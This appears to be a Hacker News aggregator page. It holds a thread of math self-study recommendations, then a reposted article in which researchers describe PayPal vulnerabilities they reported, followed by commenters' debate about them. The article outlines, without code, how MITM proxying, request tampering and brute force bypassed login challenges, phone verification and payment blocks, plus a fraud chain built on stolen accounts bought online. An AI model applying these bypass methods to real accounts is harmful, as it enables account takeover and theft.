Precalculus in a Nutshell is a beautiful little book by George F Simmons, which pretty much captures everything you need to know to undertake the study of calculus. https://www.maa.org/press/maa-reviews/precalculus-mathematic...

Linear algebra is quite a beautiful, approachable subject; and a certain amount of it is necessary to make the leap from single variable to multi-variable calculus. Without a good grip on calculus, you can't really what's going on under the covers with linear algebra. What you need to do is precalculus (Simmons) -> single variable calculus -> very introductory / elementary linear algebra -> multi variable calculus (Apostol) -> less introductory linear algebra but still fairly basic (Gilbert Strang Intro to Linear Algebra) -> mathematical analysis (Apostol) -> linear algebra done right (Axler). You have to apply a spiral method where you return to subjects as you gain the tools you need to understand them better. You'll never be done understanding geometry, algebra, or analysis.

Also, math is a problem solving art, and you can't solve problems by reading, you solve them by thinking. Seek out problems that challenge and consolidate your understanding. You should be able to prove everything in Simmons and it should seem totally natural and intuitive. Then you're ready to struggle with calculus, which is a subject humanity struggled with for centuries before getting a rigorous handle on. You probably want to get a handle on the mechanics and intuition, first, and for that I've heard that "Calculus Made Easy" by Silvanus Thompson is good.

Don't try to eat too much all at once, you'll make yourself sick. Don't try to cheat yourself of the patient struggle to understand, confusion is completely natural when striving to really know something.

heymijo(10000) 1 day ago [-]

GREAT QUESTION!

tl;dr - don't be afraid to go back to math concepts from elementary school to help you along the way to learning more math.

You have a gaggle of responses to go through, but I want to put this out there anyways.

Algebra is talked about as a 'breaking point' for many Americans; however the solutions rarely look at what transpired (or didn't) all those years before a student reached algebra.

Math standards in the United States are set so that ideally:

Kindergarten: learn to count

1st and 2nd grade: learn to think additively (+ and -)

3rd and 4th grade: learn to think multiplicatively (x and division); learn fractions

5th and 6th grade: learn to think in ratios and proportions; learn to think algebraically

Throughout all of those grades you are also supposed to be learning the properties of operations.

By the time you reach an algebra course in 8th grade or 9th grade, it requires you to call upon all of that previous knowledge.

Common problems:

- learning the properties of operations by rote and thus not understanding how to use them to manipulate algebraic equations

- not making the leap from additive to multiplicative reasoning, which hurts a students ability to understand fractions, which hurts a students ability to understand ratios and proportions, which hurts a students ability to reason with algebraic equations

- I forgot exponents. Most students only know those by rote or a bit about them before suddenly seeing huge exponents and negative exponents attached to variables in algebra.

Algebra itself may not be a problem. It is however a strong indicator of knowledge of the above. It's also where the house of cards falls down for students like you and me.

Source: was student who math fell apart for in school. I learned all about this when I left the business world to teach 4th grade, eventually created and piloted an 'Arithmetic to Algebra' course for students to put all of this into practice, students learned, we rejoiced

fizixer(10000) 1 day ago [-]

Simmons - Precalculus Mathematics in a Nutshell [0] (128 page booklet)

[0] https://books.google.com/books?id=dN1KAwAAQBAJ

ssivark(4149) 1 day ago [-]

IIRC, the Schaum series books have been very good for this level. Very concise, no nonsense, gets to the point simply, and has a bunch of exercises.

One thing I've realized from experience: most books with lots of pictures and thick stacks are faking it (i.e. most college and school math/physics textbooks are not even worth the paper they're printed on). The whole conceptual basis of these subjects is to distill everything down to a few simple ideas, which can then be applied in different contexts. The concise books typically tend to be much better at conveying the essence without bullshit. You just need to read a couple of hundred pages without getting stressed, rather than getting lost in an 800 page book and losing the big picture.

happy-go-lucky(58) 1 day ago [-]

> I find these books very helpful whenever I need to brush up on math

> Each grade folder has a number of chapters, each chapter with a number of exercises, and answers to these in a single file.

> Exemplar Problems (for in-depth learning) with Answers

> Try solving the exercises and problems using pen and paper.

https://github.com/srigalibe/NCERT_India_Grade_Mathematics

marzell(10000) 1 day ago [-]

I'm in a similar situation - been programming for 25 years (off and on) since I started in middle school on my own. But in school we had 'Algebra I' and 'Geometry I' and I never went beyond that. Struggled with quadratic equations and factoring, never heard anything about trigonometry (which I now realize starts in basic geometry), calculus, and never heard the words 'function' or 'intuition' in regards to maths in school. Tried to do the classic Andrew Ng course on data science and I was completely lost every step of the way because of new language and the fact that his class was nothing like the way I had been taught so long ago.

bumbledraven(2400) 1 day ago [-]

artofproblemsolving.com is excellent. Many of their books, while intended for middle-schoolers, are replete with problems that many adults would find challenging.

khanacademygrad(10000) 1 day ago [-]

Khanacademy

LegitShady(10000) 1 day ago [-]

khan academy. lessons and practice problems. go for it.

kyawzazaw(10000) 1 day ago [-]

khanacademy has content for those school work level.

pflats(4023) 1 day ago [-]

> Also, curse the Greeks for not using more idiomatic variables. ∑ would never pass code review, what an entirely unreadable identifier

One thing I tell my high-school students: mathematics always looks harder than it actually is. One of the essential skills in succeeding in math is looking at a page of arcane 'stuff' and having your reaction be, 'Whoa! Can't wait to learn what this means,' rather than, 'Whoa! This looks so complicated!'

Mathematical is its own language that has developed across continents and millennia. It has its quirks and foibles, but overall, community consensus has guided its notation. Mathematicians want things to be simple and 'make sense', especially the notation they use. It's never as terrible as it looks.

Sigma specifically is a Greek letter, but the notation is not Greek. Like a large amount of modern mathematical notation, the convention came from Leonhard Euler in the 18th century. It was a disambiguation choice because the letter S was overloaded.

Single-symbol identifiers are enormously popular in mathematics because mathematics is not computing. Because math is (even now) essentially a handwritten subject, its design plays to the strengths of handwriting. Line size, height, and character layout are essentially freeform. Character accents and modifiers are easy. discrete_sum would never fly in a handwritten world, just like ∑ wouldn't pass code review.

rectang(3315) 1 day ago [-]

> At a reasonably quick pace

Consider discarding that requirement.

> that someone with a family + overtime startup hours could still benefit from?

I suggest drilling fundamentals with easy exercises in moments of low quality time. (I often do a few Khan Academy skills during bouts of insomnia. For others it might be the commute, or just before bed, or...) Periodic repetition over the long term is more powerful than cramming.

Save your best quality time for your family and your job. Accept that you will progress in math at a slow pace. Before too long you will nevertheless end up ahead of many successful (!) software engineers who do not have strong math foundations.

quaquaqua1(10000) 1 day ago [-]

SAT prep books such as those from Kaplan or Princeton Review tend to be extremely cheap, if not free, and cover almost all of those topics pretty succinctly :)

Speaking as someone who was kicked out of precalc and then never touched math again despite working as a dev, your point resonates with me :)

sn9(10000) 1 day ago [-]

I would use Khan Academy. Start at a level that feels too easy, even if it's elementary school math. The key to learning anything is to start at a level that feels too easy and gradually increase difficulty.

As you finish a subject, see if there's a corresponding book in the Art of Problem Solving store [0]; you can revisit the subject at a deeper level that will strengthen your foundation. The AoPS books will also expose you to areas useful in programming like discrete mathematics.

Before any of the above, take Coursera's Learning How to Learn course. You'll learn lots of effective strategies to get the most out of your efforts. For example, you can use Anki [1] to remember definitions and concepts you've managed to understand and to schedule review of problems you've already solved.

[0] https://artofproblemsolving.com/store/recommendations.php

[1] http://augmentingcognition.com/ltm.html

vector_spaces(1742) 1 day ago [-]

I like books by Ron Larson, particularly his Trigonometry and Applied Calculus books -- the applied calculus title (intended for social science and business majors) vs his 'Calculus' book (intended for math, physics, and engineering majors) is much gentler for people seeing this material for the first time. Although I do highly recommend his Calculus book once you have the other book down.

Gelfand also has some nice texts on Algebra, Trig, and Geometry that are reasonably cheap, especially if used.

I'm older and went back to school later in life to study math, and these are the books I learned that material (for the first time -- I flunked math thru high school) from.

Here are the exact titles and ISBN-10s:

Ron Larson, Calculus: An Applied Approach, ISBN: 0618218696

Ron Larson, Trigonometry, ISBN: 1133954332

Israel Gelfand, Trigonometry, ISBN: 0817639144

Israel Gelfand, Geometry, ISBN:1071602977

Israel Gelfand, Algebra, ISBN: 0817636773

And as others have mentioned, Khan Academy is pretty good, although I tend to prefer patrickJMT's explanations a bit more: http://patrickjmt.com/

bemmu(197) 1 day ago [-]

I solved this by just buying all the high school math textbooks and going through those on my own. I preferred this way, because it lets you have the same background as everyone else.

In attempt #1 I was jumping ahead to read the interesting stuff (calculus), and while I could make some progress, it was needlessly difficult because I didn't start from the basics.

It attempt #2 I started from the very beginning (course 1 out of 10 mandatory high school courses), and focused on doing exercises. However progress was slow, because I would just continue forward when I felt like it.

Finally attempt #3 was successful. I committed to doing exercises in order consistently every day after waking up. This felt great, as every week I was making noticeable progress, and having all the prerequisite knowledge for each next step made progress much easier than I had imagined it could be.

With the slow start but gaining pace towards the later courses, I finished this self-study project in 2 years (could have been close to half that, had I gotten into the groove from the beginning), and found it quite enjoyable. It didn't feel like a chore at all, more like the highlight of each day.

Proziam(10000) 1 day ago [-]

I know a person who tried Khan Academy to get caught up on math after a pretty poor childhood education (they didn't finish middle school). Their feedback was that they were able to get their fundamentals down enough to actually pursue more advanced topics fairly easily (about a year of self-study to go from zero to 'high-school graduate' level.)

From my own personal experience, I would recommend getting to the high-school graduate level and then taking some classes at your local university or community college for topics beyond trigonometry. You'll likely be able to handle everything up to that point on your own without much support, but many people struggle at that point and benefit from having people to ask for help when they need it.

I would wish you the best of luck, but I have no doubt you'll get to where you want to be without it.

injb(10000) 1 day ago [-]

I won't repeat the good suggestions already made, but I'll add this: find a set of the Open University MST124 text books. The OU publishes their own maths books, which are specially written for self-study (since that's your only option with the OU) and their courses generally assume very little or no previous knowledge. There's an even more basic course (MST123 I think) if that one is too advanced. These are serious courses that form part of their Mathematics degree course so they are very thorough and, I hate this word, but rigorous.

Of course you get the books when you sign up for the course, but it's way cheaper to get the books and study on your own, and you'll get 90% of the information that way.

I don't know if you'll find the pace quick or not; personally I would say that learning maths is very hard, and the materials you use are unlikely to prove to be the botteneck (spoiler: it's you).

look_lookatme(4090) 1 day ago [-]

The No Bullshit Guide To Math And Physics

https://minireference.com/

I bought the Math and Physics copy because it has an ebook option and the first chapter is the Math guide. I'm going through a few pages a day and it's crisp and straightforward. There is a sample of the first chapter on the site, I suggest you check it out to see if this is what you are looking for.

Found via an HN thread from last year on this topic.

giornogiovanna(4060) 1 day ago [-]

I know these are extremely common suggestions, but...

• 3Blue1Brown has great introductory series on linear algebra and calculus.

• Khan Academy covers pretty much all of US high school mathematics, and you can go through it at whatever pace you want.

• I can send you a few Australian high school textbooks if you want.

smallcharleston(10000) 1 day ago [-]

It's not unidentifiable once you study more. Sigma "is" "roughly" the letter S, and stands for sum. Squiggly S stands for integral (roughly a sum). Intuition for why these things roughly "are" each other takes perhaps more study.

daniel_reetz(10000) 1 day ago [-]

I had the same problem. There is a series of books for folks like us -'Pre-Algebra Demystified', 'Algebra Demystified' etc. I used them to catch up for a graduate level statistics course. One hour every morning for three months took me from pre-algebra through trig, and I did very well in class. I loved these simple books. They contain exactly zero owl-drawing.

scranglis(4269) 1 day ago [-]

Our site (brilliant.org) is designed for your use-case, among others.

throwthrowcatch(10000) 1 day ago [-]

Check out OpenStax: https://openstax.org/

sampo(890) 1 day ago [-]

There is 3 books listed that essentially cover the freshman (first year) courses in Calculus. And 4 for Linear Algebra. If you work your way through even 2 different books for one topic, you are going to have a broader foundation in the topic than a normal math student in a normal university after completing the corresponding course. And you will have spent much more time, too. University courses don't usually cover everything that is in a textbook. And students don't usually read books through. In fact, students usually try to skim the course notes just enough so that they can solve the weekly problem sets.

There is maybe nothing wrong with being thorough with the elementary topics if you're studying for fun. But if you're studying for applications, I think you should cover the basics only adequately, and then quickly move on to more advanced topics. Basic Calculus is only the foundation, stuff that is actually useful in applications comes later. Basic Linear Algebra can be useful in its own right, but the advanced stuff is even more useful.

I suggest building an adequate foundation, not a comprehensively thorough foundation, and then moving on to the more powerful stuff. Which varies depending on what you actually want to use math for.

nsainsbury(3512) about 19 hours ago [-]

To be clear, I don't at all advocate that people work through all the Calculus books. Likewise for the Linear Algebra books. My aim was to provide alternative options (which are easier, cheaper, etc.)

kevstev(10000) about 24 hours ago [-]

Do any of you all have some tips for understanding mathematical notation? I feel this is often poorly explained, and it feels like a language all its own that just does not speak to me. I did pretty well in calculus, but I still don't really understand what the dx was supposed to represent and in reality I was just really good at pattern matching when it wasn't supposed to be there anymore.

I try to read papers now and again with a math orientation, and I quickly get lost when trying to translate the concepts into cryptic formulas, and often when they make the 'obvious' transition from step 3 to step 4 I just have no idea how they got there.

I feel this is by far my biggest barrier to understanding most mathematics, and I have thus far found no way to overcome it.

bo1024(10000) about 22 hours ago [-]

I think usually the problem is 'almost getting it' and trying to move forward, which means small uncertainties add up and all the sudden one is totally lost without being sure exactly why. So it's important to go back and make sure each piece of notation is crystal clear before moving forward.

Any statement in math is meant to be directly translatable to human language. You should be able to read it out loud in English and know exactly what you mean when you say it.

Unfortunately, sometimes math uses awful notation. For example, df/dx. This is a case where df doesn't mean anything (or at least it's not normally well-defined), and dx doesn't mean anything either (same comment). But the notation as a whole means something. If we write g = df/dx, then we can understand that g is a function whose input is x and output is the slope of f at x.

strls(4292) about 23 hours ago [-]

Sounds like you might simply not understand the definitions for these operators and symbols. In other words, it's not a notation problem. I find that it's helpful to mentally replace the symbols like dy/dx, sum, lim, integral, and so on with the concepts they represent. That is, go from operators to definitions.





Historical Discussions: "We found PayPal vulnerabilities and PayPal punished us for it" (February 24, 2020: 955 points)

(957) "We found PayPal vulnerabilities and PayPal punished us for it"

957 points 1 day ago by teslademigod1 in 10000th position

cybernews.com | Estimated reading time – 15 minutes | comments | anchor

In the news, it seems that PayPal gives a lot of money to ethical hackers that find bugs in their tools and services. In March 2018, PayPal announced that they're increasing their maximum bug bounty payment to $30,000 – a pretty nice sum for hackers.

On the other hand, ever since PayPal moved its bug bounty program to HackerOne, its entire system for supporting bug bounty hunters who identify and report bugs has become more opaque, mired in illogical delays, vague responses, and suspicious behavior.

When our analysts discovered six vulnerabilities in PayPal – ranging from dangerous exploits that can allow anyone to bypass their two-factor authentication (2FA), to being able to send malicious code through their SmartChat system – we were met with non-stop delays, unresponsive staff, and lack of appreciation. Below, we go over each vulnerability in detail and why we believe they're so dangerous.

When we pushed the HackerOne staff for clarification on these issues, they removed points from our Reputation scores, relegating our profiles to a suspicious, spammy level. This happened even when the issue was eventually patched, although we received no bounty, credit, or even a thanks. Instead, we got our Reputation scores (which start out at 100) negatively impacted, leaving us worse off than if we'd reported nothing at all.

It's unclear where the majority of the problem lies. Before going through HackerOne, we attempted to communicate directly with PayPal, but we received only copy-paste Customer Support responses and humdrum, say-nothing responses from human representatives.

There also seems to be a larger issue of HackerOne's triage system, in which they employ Security Analysts to check the submitted issues before passing them onto PayPal. The only problem – these Security Analysts are hackers themselves, and they have clear motivation for delaying an issue in order to collect the bounty themselves.

Since there is a lot more money to be made from using or selling these exploits on the black market, we believe the PayPal/HackerOne system is flawed and will lead to fewer ethical hackers providing the necessary help in finding and patching PayPal's tools.

Vulnerabilities we discovered

In our analysis of PayPal's mobile apps and website UI, we were able to uncover a series of significant issues. We'll explain these vulnerabilities from the most severe to least severe, as well as how each vulnerability can lead to serious issues for the end user.

#1 Bypassing PayPal's two-factor authentication (2FA)

Using the current version of PayPal for Android (v. 7.16.1), the CyberNews research team was able to bypass PayPal's phone or email verification, which for ease of terminology we can call two-factor authentication (2FA). Their 2FA, which is called "Authflow" on PayPal, is normally triggered when a user logs into their account from a new device, location or IP address.

How we did it

In order to bypass PayPal's 2FA, our researcher used the PayPal mobile app and a MITM proxy, like Charles proxy. Then, through a series of steps, the researcher was able to get an elevated token to enter the account. (Since the vulnerability hasn't been patched yet, we can't go into detail of how it was done.)

The process is very simple, and only takes seconds or minutes. This means that attackers can gain easy access to accounts, rendering PayPal's lauded security system useless.

What's the worst case scenario here?

Stolen PayPal credentials can go for just $1.50 on the black market. Essentially, it's exactly because it's so difficult to get into people's PayPal accounts with stolen credentials that these stolen credentials are so cheap. PayPal's authflow is set up to detect and block suspicious login attempts, usually related to a new device or IP, besides other suspicious actions.

But with our 2FA bypass, that security measure is null and void. Hackers can buy stolen credentials in bulk, log in with those credentials, bypass 2FA in minutes, and have complete access to those accounts. With many known and unknown stolen credentials on the market, this is potentially a huge loss for many PayPal customers.

PayPal's response

We'll assume that HackerOne's response is representative of PayPal's response. For this issue, PayPal decided that, since the user's account must already be compromised for this attack to work, "there does not appear to be any security implications as a direct result of this behavior."

Based on that, they closed the issue as Not Applicable, costing us 5 reputation points in the process.

#2 Phone verification without OTP

Our analysts discovered that it's pretty easy to confirm a new phone without an OTP (One-Time Pin). PayPal recently introduced a new system where it checks whether a phone number is registered under the same name as the account holder. If not, it rejects the phone number.

How we did it

When a user registers a new phone number, an onboard call is made to api-m.paypal.com, which sends the status of the phone confirmation. We can easily change this call, and PayPal will then register the phone as confirmed.

The call can be repeated on already registered accounts to verify the phone.

What's the worst case scenario here?

Scammers can find lots of uses for this vulnerability, but the major implication is unmissable. By bypassing this phone verification, it will make it much easier for scammers to create fraudulent accounts, especially since there's no need to receive an SMS verification code.

PayPal's response

Initially, the PayPal team via HackerOne took this issue more seriously. However, after a few exchanges, they stopped responding to our queries, and recently PayPal itself (not the HackerOne staff) locked this report, meaning that we aren't able to comment any longer.

#3 Sending money security bypass

PayPal has set up certain security measures in order to help avoid fraud and other malicious actions on the tool. One of these is a security measure that's triggered when one of the following conditions, or a combination of these, is met:

  • You're using a new device
  • You're trying to send payments from a different location or IP address
  • There's a change in your usual sending pattern
  • The owning account is not "aged" well (meaning that it's pretty new)

When these conditions are met, PayPal may throw up a few types of errors to the users, including:

  • "You'll need to link a new payment method to send the money"
  • "Your payment was denied, please try again later"

How we did it

Our analysts found that PayPal's sending money security block is vulnerable to brute force attacks.

What's the worst case scenario here?

This is similar in impact to Vulnerability #1 mentioned above. An attacker with access to stolen PayPal credentials can access these accounts after easily bypassing PayPal's security measure.

PayPal's response

When we submitted this to HackerOne, they responded that this is an "out-of-scope" issue since it requires stolen PayPal accounts. As such, they closed the issue as Not Applicable, costing us 5 reputation points in the process.

#4 Full name change

By default, PayPal allows users to only change 1-2 letters of their name once (usually because of typos). After that, the option to update your name disappears.

However, using the current version of PayPal.com, the CyberNews research team was able to change a test account's name from "Tester IAmTester" to "christin christina".

How we did it

We discovered that if we capture the requests and repeat it every time by changing 1-2 letters at a time, we are able to fully change account names to something completely different, without any verification.

We also discovered that we can use any unicode symbols, including emojis, in the name field.

What's the worst case scenario here?

An attacker, armed with stolen PayPal credentials, can change the account holder's name. Once they've completely taken over an account, the real account holder wouldn't be able to claim that account, since the name has been changed and their official documents would be of no assistance.

PayPal's response

This issue was deemed a Duplicate by PayPal, since it had been apparently discovered by another researcher.

#5 The self-help SmartChat stored XSS vulnerability

PayPal's self-help chat, which it calls SmartChat, lets users find answers to the most common questions. Our research discovered that this SmartChat integration is missing crucial form validation that checks the text that a person writes.

How we did it

Because the validation is done at the front end, we were able to use a man in the middle (MITM) proxy to capture the traffic that was going to Paypal servers and attach our malicious payload.

What's the worst case scenario here?

Anyone can write malicious code into the chatbox and PayPal's system would execute it. Using the right payload, a scammer can capture customer support agent session cookies and access their account.

With that, the scammer can log into their account, pretend to be a customer support agent, and get sensitive information from PayPal users.

PayPal's response

The same day that we informed PayPal of this issue, they replied that since it isn't "exploitable externally," it is a non-issue. However, while we planned to send them a full POC (proof of concept), PayPal seems to have removed the file on which the exploit was based. This indicates that they were not honest with us and patched the problem quietly themselves, providing us with no credit, thanks, or bounty. Instead, they closed this as Not Applicable, costing us another 5 points in the process.

#6 Security questions persistent XSS

This vulnerability is similar to the one above (#5), since PayPal does not sanitize its Security Questions input.

How we did it

Because PayPal's Security Questions input box is not validated properly, we were able to use the MITM method described above.

Here is a screenshot that shows our test code being injected to the account after refresh, resulting in a massive clickable link:

What's the worst case scenario here?

Attackers can inject scripts to other people's accounts to grab sensitive data. By using Vulnerability #1 and logging in to a user's account, a scammer can inject code that can later run on any computer once a victim logs into their account.

This includes:

  • Showing a fake pop up that could say "Download the new PayPal app" which could actually be malware.
  • Changing the text user is adding. For example, the scammer can alter the email where the money is being sent.
  • Keylogging credit card information when the user inputs it.

There are many more ways to use this vulnerability and, like all of these exploits, it's only limited by the scammer's imagination.

PayPal's response

The same day we reported this issue, PayPal responded that it had already been reported. Also on the same day, the vulnerability seems to have been patched on PayPal's side. They deemed this issue a Duplicate, and we lost another 5 points.

PayPal's reputation for dishonesty

PayPal has been on the receiving end of criticism for not honoring its own bug bounty program.

Most ethical hackers will remember the 2013 case of Robert Kugler, the 17-year old German student who was shafted out of a huge bounty after he discovered a critical bug on PayPal's site. Kugler notified PayPal of the vulnerability on May 19, but apparently PayPal told him that because he was under 18, he was ineligible for the Bug Bounty Program.

But according to PayPal, the bug had already been discovered by someone else, but they also admitted that the young hacker was just too young.

Another researcher earlier discovered that attempting to communicate serious vulnerabilities in PayPal's software led to long delays. At the end, and frustrated, the researcher promises to never waste his time with PayPal again.

There's also the case of another teenager, Joshua Rogers, also 17 at the time, who said that he was able to easily bypass PayPal's 2FA. He went on to state, however, that PayPal didn't respond after multiple attempts at communicating the issue with them.

PayPal acknowledged and downplayed the vulnerability, later patching it, without offering any thanks to Rogers.

The big problem with HackerOne

HackerOne is often hailed as a godsend for ethical hackers, allowing companies to get novel ways to patch up their tools, and allowing hackers to get paid for finding those vulnerabilities.

It's certainly the most popular, especially since big names like PayPal work exclusively with the platform. There have been issues with HackerOne's response, including the huge scandal involving Valve, when a researcher was banned from HackerOne after trying to report a Steam zero-day.

However, its Triage system, which is often seen as an innovation, actually has a serious problem. The way that HackerOne's triage system works is simple: instead of bothering the vendor (HackerOne's customer) with each reported vulnerability, they've set up a system where HackerOne Security Analysts will quickly check and categorize each reported issue and escalate or close the issues as needed. This is similar to the triage system in hospitals.

These Security Analysts are able to identify the problem, try to replicate it, and communicate with the vendor to work on a fix. However, there's one big flaw here: these Security Analysts are also active Bug Bounty Hackers.

Essentially, these Security Analysts get first dibs on reported vulnerabilities. They have full discretion on the type of severity of the issue, and they have the power to escalate, delay or close the issue.

That presents a huge opportunity for them, if they act in bad faith. Other criticisms have pointed out that Security Analysts can first delay the reported vulnerability, report it themselves on a different bug bounty platform, collect the bounty (without disclosing it of course), and then closing the reported issue as Not Applicable, or perhaps Duplicate.

As such, the system is ripe for abuse, especially since Security Analysts on HackerOne use generic usernames, meaning that there's no real way of knowing what they are doing on other bug bounty platforms.

What it all means

All in all, the exact "Who is to blame" question is left unanswered at this point, because it is overshadowed by another bigger question: why are these services so irresponsible?

Let's point out a simple combination of vulnerabilities that any malicious actor can use:

  1. Buy PayPal accounts on the black market for pennies on the dollar. (On this .onion website, you can buy a $5,000 PayPal account for just $150, giving you a 3,333% ROI.)
  2. Use Vulnerability #1 to bypass the two-factor authentication easily.
  3. Use Vulnerability #3 to bypass the sending money security and easily send money from the linked bank accounts and cards.

Alternatively, the scammer can use Vulnerability #1 to bypass 2FA and then use Vulnerability #4 to change the account holder's name. That way, the scammer can lock the original owner out of their own account.

While these are just two simple ways to use our discovered vulnerabilities, scammers – who have much more motivation and creativity for maliciousness (as well as a penchant for scalable attacks) – will most likely have many more ways to use these exploits.

And yet, to PayPal and HackerOne, these are non-issues. Even worse, it seems that you'll just get punished for reporting it.




All Comments: [-] | anchor

ohithereyou(10000) 1 day ago [-]

I've seen several stories about how HackerOne doesn't pay out bug bounties when bugs are reported. I, for one, wouldn't submit bugs/PoC to them, and I would actively, publically, and immediately disclose bugs that affect anybody who is a client of HackerOne.

sn4pp(10000) 1 day ago [-]

> I would actively, publically, and immediately disclose bugs that affect anybody who is a client of HackerOne.

Sadly you can't feed your children from media drama.

Maybe, in the long run, but it's more likely to get sued.

thaumasiotes(3762) 1 day ago [-]

HackerOne, itself, is pretty generous about reported bugs. (As in, you reported an issue in the website hackerone.com.) They have to be, because their existence depends on everyone thinking bug bounty platforms are a good idea -- it's part of their way of encouraging people to hunt for bug bounties in general.

Payouts for bugs in other products are determined by those companies, not by H1.

thrownaway954(4317) 1 day ago [-]

i think you might want to take a breath, rethink that position and not let your anger cause you to do something stupid. if you disclose a vulnerability, the company HAS EVERY RIGHT to sue you. every security researcher _thinks_ that they are protected by some unwritten good Samaritan law, when in fact, you are hacking and that carries financial and criminal penalties. this is why these bug bounties and established ways of notifying the company of the vulnerabilities exists. you stepping outside of these established channels can be VERY costly. imagine in a moment of unclear thinking and childish behavior, you do something that could cost you your livelihood and financial well-being and also, maybe, get you thrown in jail.

savingGrace(10000) 1 day ago [-]

This is what I was thinking. The only stories I ever see about HackerOne are how horrible they are. As a non-sec dev, I only ever get the feeling that bounty hunting for profitability is the same as trying to sell something on eBay. You're eventually going to get scammed and you have to eat the loss.

soared(4275) 1 day ago [-]

Are hackerone analysts employees of the company? If so the conclusion drawn sounds like complete bs.

If the analysts are just other users, then it definitely sounds like there is a problem.

teslademigod1(10000) 1 day ago [-]

not sure: https://www.hackerone.com/blog/Getting-to-know-the-HackerOne...

'When they aren't triaging reports on our platform, they are spending time on their own bug bounty hunts.'

thaumasiotes(3762) 1 day ago [-]

Bug triagers may be employees of HackerOne, employees of the company (e.g. Paypal here), or contractors indirectly working for the company (I worked in this role for a year). They're not going to be random other researchers.

The screenshots in this article show a 'HackerOne Staff' stamp, so those triagers are employees of H1.

sn4pp(10000) 1 day ago [-]

> They deemed this issue a Duplicate, and we lost another 5 points.

A dupe costs points?! On bugcrowd you GET points for dupes...

thaumasiotes(3762) 1 day ago [-]

The points associated with a duplicate report depend on the status of the report you get duped to. I assume in this case the original report was Not Applicable.

chatmasta(972) 1 day ago [-]

Seems like a dumb policy unless you can see all previous reports.

rideontime(10000) 1 day ago [-]

From PayPal's response to a 2FA bypass:

> If the attacker has the victim's password, they would already be able to gain access to the account via web UI too. As such, the account is already compromised. As such, there does not appear to be any security implications as a direct result of this behavior.

Seriously? This means PayPal's 2FA is just security theater. I'd rather they didn't offer it at all in this case, at least then I'd know how insecure my account really was.

mtgx(168) 1 day ago [-]

I think if you Google Paypal 2FA security issue, you'll find multiple such bugs found over the years. They've never fixed it.

nebulous1(10000) 1 day ago [-]

From reading a different article, the terminology seems to be a bone of contention here. This '2FA' is an email message PayPal send when they detect a new login location. They do not call it 2FA and they do offer actual 2FA that cybernews have not bypassed.

rasengan(1383) 1 day ago [-]

PCI DSS requirements specify that companies have 30 days to refute or remediate externally reported issues [1]. If they don't respond or fix some of these issues, then PayPal will no longer be compliant and all credit card companies will be forced to stop working with them unless they wish to set precedence that PCI-DSS compliance is no longer required to be followed.

According to this image [2], they did not respond or refute within 30 days.

If PayPal's PCI-DSS compliance certification isn't revoked then PCI-DSS is a farce.

[1] https://www.itgovernance.co.uk/blog/a-guide-to-the-pci-dsss-...

[2] https://cybernews.com/wp-content/uploads/2020/02/paypal-2fa-...

87zuhjkas(10000) 1 day ago [-]

There is no doubt that the PCI-DSS is a farce.

tptacek(84) 1 day ago [-]

How is this the top comment on the thread? Do people really believe that failing to respond to a self-XSS report on HackerOne to the satisfaction of the reporter would cause someone to lose their PCI certification?

whatsmyusername(10000) 1 day ago [-]

PCI-DSS does not have Bug Bounty requirements. That's referring to ASV scans which have to be run quarterly by a specific list of vendors and then there's a dispute/remediation process.

Their response is dogshit but not for this reason.

admax88q(10000) 1 day ago [-]

> then PCI-DSS is a farce.

Take a wild guess on what you think will happen.

ohithereyou(10000) 1 day ago [-]

Are there other cases where PCI-DSS compliance requirements are selectively enforced?

rsync(3728) about 23 hours ago [-]

'If PayPal's PCI-DSS compliance certification isn't revoked then PCI-DSS is a farce.'

PCI Compliance is total bullshit and everybody knows it.[1]

[1] https://www.rsync.net/resources/regulatory/pci.html

tsukurimashou(10000) 1 day ago [-]

no shit PCI-DSS is a farce

it's just there to make people that don't know anything about technology feel better

ailideex(4205) 1 day ago [-]

> PCI DSS requirements specify that companies have 30 days to refute or remediate externally reported issues [1]. If they don't respond or fix some of these issues, then PayPal will no longer be compliant and all credit card companies will be forced to stop working with them unless they wish to set precedence that PCI-DSS compliance is no longer required to be followed.

Quote from your source:

> If your scan fails, you must schedule a rescan within 30 days to prove that the critical, high-risk or medium-risk vulnerabilities have been patched.

Scan in this sentence refers to 'a PCI DSS external scan'.

The list of approved vendors that can conduct PCI DSS external scans can be found here: https://www.pcisecuritystandards.org/assessors_and_solutions...

Please find cybernews' certificate number there and quote it for us, I have looked and can't find it.

I would guess that, contrary to your implication, they are not an approved scanning vendor. If this is the case then it really does not speak to the characteristics of PCI-DSS and your comment just seems wrong.

And even if they were an approved scanning vendor, from what little I know about PCI-DSS, these scans are part of larger process - so even if they were an approved scanning vendor the scan failure would still have had to be part of the larger process for this 30 day limit to apply.

I could go on and on about how much I hate PayPal and random other things, but just because I don't like something does not quite justify making false claims about it.

znpy(1679) 1 day ago [-]

My suspicion is that Paypal is now 'too big to fail' and will suffer very little consequences if none at all.

tptacek(84) about 24 hours ago [-]

People have a weird mental model of how big-company bug bounty programs work. Paypal --- a big company for sure, with a large and talented application security team --- is not interested in stiffing researchers out of bounties. They have literally no incentive to do so. In fact: the people tasked with running the bounty probably have the opposite incentive: the program looks better when it is paying out bounties for strong findings.

Here are the vulnerabilities in their report:

1. They can suppress a new-computer login challenge (they call this '2FA', but this is a risk-based login or anti-ATO feature, not 2FA).

2. They can register accounts for one phone, then change it to another phone, to 'bypass' phone number confirmation.

3. There are risk-based controls in Paypal that prevent transactions when anomalies are detected, and some of them can apparently be defeated with brute force.

4. They can change names on accounts they control.

5. They found what appears to be self-XSS in a support chat system.

6. They found what appears to be self-XSS in the security questions challenge inputs.

None of these are sev:hi vulnerabilities, let alone 'critical'. 2 of them --- #4 and #6 --- are duplicates of other people's issues. Self-XSS vulnerabilities are often excluded entirely from bounty programs.

For the last 3 hours, the top comment on this thread has been an analysis saying that, because Paypal is PCI-encumbered, and HackerOne reports can function as 'assessments' for PCI attestations, Paypal is in danger of losing its PCI status (and the fact that it won't is evidence that they are 'too big to fail'). To put it gently: that is not how any of this stuff works. In reality, formal bug bounty programs are a firehose of reports suggesting that DKIM configuration quirks are critical vulnerabilities, and nobody in the world would expect any kind of regulatory outcome simply from the way a bounty report does or doesn't get handled. It should, I hope, go without saying that nobody is required to run a bounty in the first place, and most companies probably shouldn't.

The login challenge bypass finding was actually interesting (it would be more interesting if they fully disclosed what it was and what Paypal's response was). But these reporters have crudded up their story with standard bug-bounty-reporter hype, and made it very difficult to judge what they found. I'm inclined not to believe their claim that Paypal acted abusively here (and I am not a fan of Paypal).

blazespin(3912) about 23 hours ago [-]

(remove message)

